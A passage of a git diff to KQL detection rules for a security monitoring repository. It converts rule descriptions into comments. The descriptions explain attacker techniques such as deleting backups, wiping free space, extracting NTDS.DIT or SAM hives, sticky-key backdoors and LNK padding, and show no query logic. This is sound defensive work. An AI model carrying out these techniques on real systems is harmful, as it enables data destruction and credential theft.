Tactic: Impact // Tags: attack.impact, attack.t1490 diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql index 294ac0d8..0fd00424 100644 --- a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql +++ b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql @@ -3,9 +3,8 @@ // Date: 2021-12-26 // Level: medium // Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. -Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. -Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives - +// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. +// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives // MITRE Tactic: Impact // Tags: attack.impact, attack.t1485 diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql index ce83ba59..99f2d1d8 100644 --- a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql +++ b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-05-10 // Level: medium // Description: Detects the recovery of files from backups via "wbadmin.exe". -Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. - +// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. // MITRE Tactic: Impact // Tags: attack.impact, attack.t1490 diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql index 4fc05097..ffd88b56 100644 --- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql +++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql @@ -3,9 +3,8 @@ // Date: 2023-11-28 // Level: high // Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. -This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -It could also be used for anti-analysis purposes by shut downing specific processes. - +// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +// It could also be used for anti-analysis purposes by shut downing specific processes. // MITRE Tactic: Impact // Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql index cbe9deb4..6eb12974 100644 --- a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql +++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql @@ -3,9 +3,8 @@ // Date: 2023-11-28 // Level: low // Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. -This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. -It could also be used for anti-analysis purposes by shut downing specific processes. - +// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +// It could also be used for anti-analysis purposes by shut downing specific processes. // MITRE Tactic: Impact // Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql index 378dc483..1cf67326 100644 --- a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql +++ b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql @@ -3,8 +3,7 @@ // Date: 2024-05-29 // Level: medium // Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. -An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. - +// An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up. // MITRE Tactic: Impact // Tags: attack.impact, attack.t1490 // False Positives: diff --git a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql index 0aaa8b64..44266cf4 100644 --- a/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql +++ b/KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql @@ -3,7 +3,6 @@ // Date: 2021-08-09 // Level: high // Description: Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit) - // MITRE Tactic: Impact // Tags: attack.impact, attack.t1490 // False Positives: diff --git a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql index e07291bf..2fb186f4 100644 --- a/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql +++ b/KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql @@ -3,8 +3,7 @@ // Date: 2024-05-29 // Level: medium // Description: Detects deletion attempts of MacOS Time Machine backups via the native backup utility "tmutil". -An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files. - +// An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files. // MITRE Tactic: Impact // Tags: attack.impact, attack.t1490 // False Positives: diff --git a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql index 621414cc..f8be93e0 100644 --- a/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql +++ b/KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql @@ -3,8 +3,7 @@ // Date: 2024-05-29 // Level: medium // Description: Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". -An attacker can use this to prevent backups from occurring. - +// An attacker can use this to prevent backups from occurring. // MITRE Tactic: Impact // Tags: attack.impact, attack.t1490 // False Positives: diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql index 50aba8b5..b3b81cb3 100644 --- a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql +++ b/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql @@ -3,9 +3,8 @@ // Date: 2021-12-13 // Level: medium // Description: Detects the deletion of backups or system state backups via "wbadmin.exe". -This technique is used by numerous ransomware families and actors. -This may only be successful on server platforms that have Windows Backup enabled. - +// This technique is used by numerous ransomware families and actors. +// This may only be successful on server platforms that have Windows Backup enabled. // MITRE Tactic: Impact // Tags: attack.impact, attack.t1490 // False Positives: diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql index 8c12f212..613dd7ff 100644 --- a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql +++ b/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql @@ -3,9 +3,8 @@ // Date: 2025-07-31 // Level: medium // Description: Detects attempts to disable windows recovery environment using Reagentc. -ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE). -It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues. - +// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE). +// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues. // MITRE Tactic: Impact // Tags: attack.impact, attack.t1490 // False Positives: diff --git a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql index c897e99c..068f7377 100644 --- a/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql +++ b/KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql @@ -3,8 +3,7 @@ // Date: 2022-02-11 // Level: medium // Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. -This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. - +// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1566.001 // False Positives: diff --git a/KQL/rules/Initial Access/office_macro_file_download.kql b/KQL/rules/Initial Access/office_macro_file_download.kql index ad71288f..8a198700 100644 --- a/KQL/rules/Initial Access/office_macro_file_download.kql +++ b/KQL/rules/Initial Access/office_macro_file_download.kql @@ -3,8 +3,7 @@ // Date: 2022-01-23 // Level: low // Description: Detects the creation of a new office macro files on the system via an application (browser, mail client). -This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation. - +// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1566.001 // False Positives: diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql index 716880e7..6607f99e 100644 --- a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql +++ b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql @@ -3,8 +3,7 @@ // Date: 2025-07-22 // Level: high // Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. -This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code. - +// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1566.001 // False Positives: diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql index 983a2cee..c5bf10b1 100644 --- a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql +++ b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql @@ -3,8 +3,7 @@ // Date: 2025-07-24 // Level: high // Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. -This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770. - +// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003 diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql index c0613ed3..40924da6 100644 --- a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql +++ b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql @@ -3,10 +3,9 @@ // Date: 2025-03-19 // Level: high // Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D). -Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. -The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. -This rule flags suspicious use of such padding observed in real-world attacks. - +// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary. +// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks. +// This rule flags suspicious use of such padding observed in real-world attacks. // MITRE Tactic: Initial Access // Tags: attack.initial-access, attack.execution, attack.t1204.002 diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql index 8c969a5b..2374defc 100644 --- a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql +++ b/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql @@ -3,7 +3,6 @@ // Date: 2024-01-29 // Level: high // Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options. - // MITRE Tactic: Lateral Movement // Tags: attack.lateral-movement, attack.t1021.002 diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql index db0ceee6..4e94032f 100644 --- a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql +++ b/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql @@ -3,8 +3,7 @@ // Date: 2022-01-07 // Level: medium // Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. -Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. - +// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. // MITRE Tactic: Lateral Movement // Tags: attack.lateral-movement, attack.t1021.001 // False Positives: diff --git a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql index 03f89a4b..5808e874 100644 --- a/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql +++ b/KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql @@ -3,8 +3,7 @@ // Date: 2019-05-15 // Level: high // Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. -An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. - +// An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. // MITRE Tactic: Lateral Movement // Tags: attack.lateral-movement, attack.t1021.001, car.2013-07-002 // False Positives: diff --git a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql index ba3cdbcd..e3c243d4 100644 --- a/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql +++ b/KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql @@ -3,7 +3,6 @@ // Date: 2023-11-13 // Level: high // Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. - // MITRE Tactic: Lateral Movement // Tags: attack.t1021.003, attack.lateral-movement diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql index 1d58721a..13fef618 100644 --- a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql +++ b/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql @@ -3,7 +3,6 @@ // Date: 2025-10-22 // Level: medium // Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity. - // MITRE Tactic: Lateral Movement // Tags: attack.lateral-movement, attack.t1021.006 // False Positives: diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql index bf99d8de..6dad275c 100644 --- a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql +++ b/KQL/rules/Lateral Movement/winrs_local_command_execution.kql @@ -3,8 +3,7 @@ // Date: 2025-10-22 // Level: high // Description: Detects the execution of Winrs.exe where it is used to execute commands locally. -Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement. - +// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement. // MITRE Tactic: Lateral Movement // Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218 // False Positives: diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql index dab5469d..1cff4d81 100644 --- a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql +++ b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql @@ -3,8 +3,7 @@ // Date: 2022-07-30 // Level: high // Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) -but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack - +// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql index eac11d71..3ac845dc 100644 --- a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql +++ b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql @@ -3,9 +3,8 @@ // Date: 2021-07-22 // Level: medium // Description: Detects when a user enables DNS-over-HTTPS. -This can be used to hide internet activity or be used to hide the process of exfiltrating data. -With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. - +// This can be used to hide internet activity or be used to hide the process of exfiltrating data. +// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112 // False Positives: diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/Persistence/enable_lm_hash_storage.kql index ebf62ff6..4a343b3f 100644 --- a/KQL/rules/Persistence/enable_lm_hash_storage.kql +++ b/KQL/rules/Persistence/enable_lm_hash_storage.kql @@ -3,8 +3,7 @@ // Date: 2023-12-15 // Level: high // Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. -By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. - +// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql index 798ffe5e..7bc80978 100644 --- a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql +++ b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql @@ -3,8 +3,7 @@ // Date: 2023-12-15 // Level: high // Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. -By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. - +// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql index 540adb33..6907e509 100644 --- a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql +++ b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql @@ -3,9 +3,8 @@ // Date: 2021-08-21 // Level: high // Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. -In it's default mode, it builds a self deleting .bat file which executes malicious command. -The detection rule relies on creation of the malicious bat file (debug.bat by default). - +// In it's default mode, it builds a self deleting .bat file which executes malicious command. +// The detection rule relies on creation of the malicious bat file (debug.bat by default). // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 // False Positives: diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql index 1bd9aa24..0182d337 100644 --- a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql +++ b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql @@ -3,8 +3,7 @@ // Date: 2022-08-12 // Level: high // Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications -Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded - +// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql index dc78d7b3..b0ce1d9b 100644 --- a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql +++ b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql @@ -3,9 +3,8 @@ // Date: 2025-10-17 // Level: high // Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. -Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. -This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity. - +// Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. +// This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.impact, attack.t1653 // False Positives: diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql index d84ce3f5..6f1fd198 100644 --- a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql +++ b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql @@ -3,10 +3,9 @@ // Date: 2020-10-29 // Level: medium // Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. -When the job runs on the system the command specified in the BITS job will be executed. -This can be abused by actors to create a backdoor within the system and for persistence. -It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded. - +// When the job runs on the system the command specified in the BITS job will be executed. +// This can be abused by actors to create a backdoor within the system and for persistence. +// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1197 diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql index 1843453b..71d92e82 100644 --- a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql +++ b/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql @@ -3,9 +3,8 @@ // Date: 2022-11-18 // Level: high // Description: Detects changes to the NGenAssemblyUsageLog registry key. -.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). -By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. - +// .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). +// By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.t1112 diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql index 7b2543b6..2ef19710 100644 --- a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql +++ b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql @@ -3,9 +3,8 @@ // Date: 2022-06-19 // Level: high // Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. -Adversaries may abuse time providers to execute DLLs when the system boots. -The Windows Time service (W32Time) enables time synchronization across and within domains. - +// Adversaries may abuse time providers to execute DLLs when the system boots. +// The Windows Time service (W32Time) enables time synchronization across and within domains. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003 diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql index 54c2e904..a46ba71c 100644 --- a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql +++ b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql @@ -3,12 +3,11 @@ // Date: 2022-07-21 // Level: medium // Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. -The disk cleanup manager is part of the operating system. -It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. -Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. -Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. -Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. - +// The disk cleanup manager is part of the operating system. +// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. // MITRE Tactic: Persistence // Tags: attack.persistence diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql index 7b53e8cb..17e4ebb7 100644 --- a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql +++ b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql @@ -3,8 +3,7 @@ // Date: 2020-02-18 // Level: critical // Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. -When the sticky keys are "activated" the privilleged shell is launched. - +// When the sticky keys are "activated" the privilleged shell is launched. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation // False Positives: diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql index 336bfe26..ee688555 100644 --- a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql +++ b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql @@ -3,8 +3,7 @@ // Date: 2020-07-15 // Level: low // Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. -An attacker can use this to authenticate to Azure AD in a browser as that user. - +// An attacker can use this to authenticate to Azure AD in a browser as that user. // MITRE Tactic: Persistence // Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 // False Positives: diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql index 63ed0524..d8fcf124 100644 --- a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql +++ b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql @@ -3,7 +3,6 @@ // Date: 2021-06-29 // Level: high // Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. - // MITRE Tactic: Persistence // Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 // False Positives: diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql index a3b0ff5c..c3a246da 100644 --- a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql +++ b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql @@ -3,8 +3,7 @@ // Date: 2022-08-09 // Level: medium // Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence -The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. - +// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. // MITRE Tactic: Persistence // Tags: attack.persistence diff --git 